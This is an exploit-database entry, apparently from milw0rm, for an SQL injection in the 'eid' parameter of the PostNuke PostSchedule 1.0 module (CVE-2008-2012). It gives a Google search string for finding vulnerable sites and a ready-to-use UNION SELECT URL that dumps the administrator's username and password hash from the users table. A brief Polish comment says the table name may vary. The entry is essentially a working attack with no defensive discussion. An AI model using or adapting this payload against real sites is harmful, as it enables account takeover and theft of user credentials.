PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2008-04-24 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44756;CVE-2008-2012 
tags: 
aliases:  
screenshot_url:  
application_url: 

Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.

Homepage: http://devilteam.pl/

# milw0rm.com [2008-04-25]